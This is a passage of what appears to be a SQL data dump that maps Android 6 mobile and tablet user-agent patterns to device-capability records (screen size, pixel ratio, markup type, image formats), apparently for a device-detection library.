(KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6633) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6643) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6646) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; D6653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIAMOND M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIG-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIG-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIG-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIG-L21HN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIG-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIG-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DIGICELDL1plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DM-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DOOGEE X10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DP-CMX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; DUAL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Dash L2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Dash L3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Dash L4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Dash X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Dash XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Desire 530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Diamond LTE Gold) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E2303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E2306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E2312) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E2333) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E2353) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E500A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5333) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5343) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5533) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5606) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5633) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5663) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5803) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E5823) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E6553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E6653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; E7s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; EF500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ELEMENT Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ELUGA Prim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ELUGA Ray Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ENERGY S600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; EVA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; EVA-L19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; EVA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Easy L Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Easy L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Easy XL Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Easy XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Easy_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Easy_S_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ektra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Elegance_5_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Elegance_5_5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Elite 5.0L+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Elite 5.5L+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Elite Sense) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Energy Phone Max 2+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Energy S500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Energy400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ergo F502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; EverStar Nano) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; EverStar Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; EverStar Q40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F-03H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F-04G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F-04H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F-04J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F1-TT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F103 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 